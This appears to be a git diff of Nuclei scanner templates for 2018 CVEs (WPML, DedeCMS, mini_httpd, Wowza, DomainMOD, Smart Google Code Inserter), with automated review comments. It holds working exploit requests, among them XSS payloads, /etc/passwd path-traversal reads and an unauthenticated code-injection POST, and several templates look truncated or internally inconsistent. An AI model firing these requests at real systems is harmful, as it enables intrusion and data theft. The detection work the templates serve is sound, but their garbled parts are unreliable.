+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2018-18069
+ cwe-id: CWE-79
+ reference:
+ - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-admin/admin.php"
+ body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">'
+ redirects: true
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")'
diff --git a/nuclei-templates/CVE-2018/cve-2018-18608.yaml b/nuclei-templates/CVE-2018/cve-2018-18608.yaml
new file mode 100644
index 0000000000..c9d46aecf6
--- /dev/null
+++ b/nuclei-templates/CVE-2018/cve-2018-18608.yaml
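Review bot: The name `Wordpress unauthenticated stored xss` in cve-2018-18069.yaml contradicts the description in the same `info:` block, which says the XSS is reached through an authenticated `theme-localization.php` request; the CVSS vector (`PR:N`) sides with the name, so one of the three is wrong, and only a blog post is listed under `reference:` to settle it — the NVD entry should be added there. The name should also follow the `Product Version - Class` form the other templates use, e.g. `name: WordPress WPML <=3.6.3 - Stored Cross-Site Scripting`. Because the probe POSTs a value into the plugin's saved locale settings, the template leaves a persistent change on the target; that deserves a comment such as `# persists the posted locale_file_name_en value in the target's WPML settings` and an `intrusive` tag.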
@@ -0,0 +1,56 @@ +id: CVE-2018-18608 + +info: + name: DedeCMS 5.7 SP2 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability. + reference: + - https://github.com/ky-j/dedecms/issues/8 + - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18608 + cwe-id: CWE-79 + epss-score: 0.00177 + epss-percentile: 0.54991 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dedecms + product: dedecms + shodan-query: http.html:"DedeCms" + tags: cve2018,cve,dedecms,xss + +http: + - method: GET + path: + - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" + - "DedeCMS Error Warning!" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
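Review bot: The request/matcher boundary in cve-2018-18608.yaml cannot be reviewed from this view: the `path:` entry runs straight into `- "DedeCMS Error Warning!"` and `condition: and` with no `matchers-condition:`, `- type: word` or `words:` between them, and the hunk header announces 56 lines while fewer are shown, so the page has most likely dropped the lines carrying the `<` payload. Confirm that the committed file declares `matchers-condition: and` ahead of the three matchers; without it the body-word, `text/html` header and 200-status matchers are combined with the default `or`, and the template would flag practically every DedeCMS install.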
diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/cve-2018-18777.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18777.yaml rename to nuclei-templates/CVE-2018/cve-2018-18777.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/cve-2018-18778.yaml deleted file mode 100644 index 556e6cf52e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-18778.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-18778 - -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - tags: cve,cve2018,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.50 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18925.yaml b/nuclei-templates/CVE-2018/cve-2018-18925.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-18925.yaml rename to nuclei-templates/CVE-2018/cve-2018-18925.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19136.yaml b/nuclei-templates/CVE-2018/cve-2018-19136.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-19136.yaml rename to nuclei-templates/CVE-2018/cve-2018-19136.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-19365.yaml b/nuclei-templates/CVE-2018/cve-2018-19365.yaml index 7b30433c16..2b040cfd71 100644 --- a/nuclei-templates/CVE-2018/cve-2018-19365.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-19365.yaml 
@@ -1,20 +1,34 @@ id: CVE-2018-19365 + info: - name: Wowza Streaming Engine Manager Directory Traversal + name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal author: 0x_Akoko - severity: high - description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request + severity: critical + description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://www.cvedetails.com/cve/CVE-2018-19365 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 + - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.1 cve-id: CVE-2018-19365 cwe-id: CWE-22 - tags: cve,cve2018,wowza,lfi + epss-score: 0.01354 + epss-percentile: 0.8589 + cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: wowza + product: streaming_engine + tags: cve2018,cve,wowza,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" 
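Review bot: The new vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H` (score 9.1) in cve-2018-19365.yaml claims high availability impact, but the description on the same hunk only describes traversal and retrieval of a file; nothing in the template supports `A:H`, and raising severity to critical on that basis changes how the finding is prioritized. Check the NVD entry added under `reference:` and either match its vector or leave a comment on the line explaining the deviation, e.g. `# vector follows the vendor advisory rather than the description above`. The `cpe` value `4.7.4.0.1` also differs from the `4.7.4.01` in the name and description; if that is the registered CPE spelling, saying so in a comment avoids a future "fix". The second hunk of this file (the digest line) is on the next physical line.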
@@ -29,3 +43,4 @@ requests: - type: status status: - 200 +# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19386.yaml b/nuclei-templates/CVE-2018/cve-2018-19386.yaml deleted file mode 100644 index 1d426ddfe2..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19386.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-19386 - -info: - name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting - author: pikpikcu - severity: medium - reference: https://www.cvedetails.com/cve/CVE-2018-19386/ - tags: cve,cve2018,solarwinds,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-19386 - cwe-id: CWE-79 - description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." - -requests: - - method: GET - path: - - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '')" + condition: and +# digest: 4b0a00483046022100c2a0e755f2e7f7a0744d4444c1e2d3880abdcaf721e4f7a8dc1e593faaf4521e0221008758fdacd7ef1cdf080680a53f6ab8d435d736dbc60a7c8f9440afa49d90d100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19751.yaml b/nuclei-templates/CVE-2018/cve-2018-19751.yaml new file mode 100644 index 0000000000..7cc00d6e2e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19751.yaml 
@@ -0,0 +1,69 @@ +id: CVE-2018-19751 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45947/ + - https://github.com/domainmod/domainmod/issues/83 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19751 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19751 + cwe-id: CWE-79 + epss-score: 0.00096 + epss-percentile: 0.39112 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/ssl-fields/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test + - | + GET /admin/ssl-fields/ HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# 
digest: 4b0a00483046022100a7525decbb4900d6df4ebff0a8ecf9f11dbb17f10b61a59c45f8837ab3e3375d022100f61ce3800147fd13bc690df9bfc1eecdcc22c78bc4292c2f298468b2f1d0f993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19877.yaml b/nuclei-templates/CVE-2018/cve-2018-19877.yaml deleted file mode 100644 index 2feb8e4312..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19877.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-19877 - -info: - name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. - reference: - - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - - https://www.exploit-db.com/exploits/45958/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19877 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19877 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: adiscon,xss,edb,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19892.yaml b/nuclei-templates/CVE-2018/cve-2018-19892.yaml new file mode 100644 index 0000000000..e957023784 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19892.yaml 
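Review bot: cve-2018-19751.yaml (and likewise cve-2018-19892, cve-2018-19915 and cve-2018-20009 further down) creates a permanent record in the scanned application — an SSL field, a server, a host or an SSL provider named with the script payload — and never deletes it, while the first raw request posts `{{username}}`/`{{password}}` with no check that the login succeeded. The persistence should be documented and tagged (`intrusive`) so these are not run against production inventories by default; suggest `# creates an SSL field named with the payload; the record remains in the target after the scan` above the second raw request. This template ends on a body word `'">'` under `matchers-condition: and`, whereas the three siblings use DSL on `status_code_3`/`body_3`; if nuclei evaluates the plain word matcher against each of the three responses rather than only the last, the login page could satisfy it, so aligning on the DSL form would make all four behave the same. This hunk starts on the previous physical line.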
@@ -0,0 +1,69 @@ +id: CVE-2018-19892 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45959 + - https://github.com/domainmod/domainmod/issues/85 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19892 + cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.40415 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve2018,cve,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /admin/dw/add-server.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= + - | + GET /admin/dw/servers.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# 
digest: 4a0a0047304502201f24e9ecdde360ff34ab0c10a92f93fbbf91649ea9a2f0154e5cfb153518dd98022100fdae8217f56ff39de6d7e9c9e41db0001fb9c8ad1b336532ad1105c5fd39fa5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml deleted file mode 100644 index f4203954c8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19914.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19915.yaml b/nuclei-templates/CVE-2018/cve-2018-19915.yaml new file mode 100644 index 0000000000..cb24374b98 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19915.yaml 
@@ -0,0 +1,61 @@ +id: CVE-2018-19915 + +info: + name: DomainMOD <=4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/87 + - https://www.exploit-db.com/exploits/46376/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19915 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/host.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test + - | + GET /assets/hosting.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 
490a0046304402201c56275b5b7376244d1fee0f3bfde7381ade0cb088f1643b3c5e1e668e81b4490220205f8398d1ae9260a0ecd27f592441a68d4709a669d802e783370b414c610020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20009.yaml b/nuclei-templates/CVE-2018/cve-2018-20009.yaml new file mode 100644 index 0000000000..9825590c16 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20009.yaml 
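Review bot: The description in cve-2018-19915.yaml says the bug is in `assets/edit/host.php`, but the template posts to `/assets/add/host.php` and then reads `/assets/hosting.php`; either the description or the request path is wrong, and a reader cannot tell which page is actually being exercised. Whichever is correct, the other line should be changed to match, e.g. `DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/add/host.php Web Host Name or Web Host URL field.` if the request is the authoritative one. This hunk starts on the previous physical line.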
@@ -0,0 +1,59 @@
+id: CVE-2018-20009
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
+ reference:
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://www.exploit-db.com/exploits/46372/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20009
+ cwe-id: CWE-79
+ epss-score: 0.00153
+ epss-percentile: 0.51511
+ cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 3
+ vendor: domainmod
+ product: domainmod
+ tags: cve,cve2018,domainmod,xss,authenticated,edb
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/ssl-provider.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
+ - |
+ GET /assets/ssl-providers.php HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(header_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
+# digest: 
4a0a004730450220228d241f2ef228aa07915c9b1770c0a34473f66ec0ee918ba511d13df0a08d64022100e196267d6f49e1a417092b2d74d1123fbd4c5d366bb4ed2f01e227431da6b846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml new file mode 100644 index 0000000000..90d48ccdab --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20010.yaml 
@@ -0,0 +1,60 @@
+id: CVE-2018-20010
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/46373/
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20010
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20010
+ cwe-id: CWE-79
+ epss-score: 0.00153
+ epss-percentile: 0.50703
+ cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 3
+ vendor: domainmod
+ product: domainmod
+ tags: cve,cve2018,domainmod,xss,authenticated,edb
+
+http:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/ssl-provider-account.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=
+ - |
+ GET /assets/ssl-accounts.php HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(header_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: 
and +# digest: 4b0a00483046022100c634c1d3655ae86d99caaad29c7f5a5d4ef4d696601e6b952bb796b1326800c7022100f409497a17e56982fb3e63e4424b98b22222eeb4b224a7647417f3220245c8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-20011.yaml b/nuclei-templates/CVE-2018/cve-2018-20011.yaml deleted file mode 100644 index 874a57490e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-20011.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2018-20011 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. - reference: - - https://www.exploit-db.com/exploits/46374/ - - https://github.com/domainmod/domainmod/issues/88 - - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20011 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve1028 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/category.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - - - | - GET /assets/categories.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20985.yaml b/nuclei-templates/CVE-2018/cve-2018-20985.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-20985.yaml rename to nuclei-templates/CVE-2018/cve-2018-20985.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-3810.yaml b/nuclei-templates/CVE-2018/cve-2018-3810.yaml new file mode 100644 index 0000000000..242f61e9c0 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-3810.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-3810 + +info: + name: WordPress Smart Google Code Inserter Authentication Bypass + author: princechaddha + severity: critical + reference: https://www.exploit-db.com/exploits/43420 + tags: wordpress,cve,cve2018,google + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode" + + body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode' + headers: + Content-Type: application/x-www-form-urlencoded + + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 
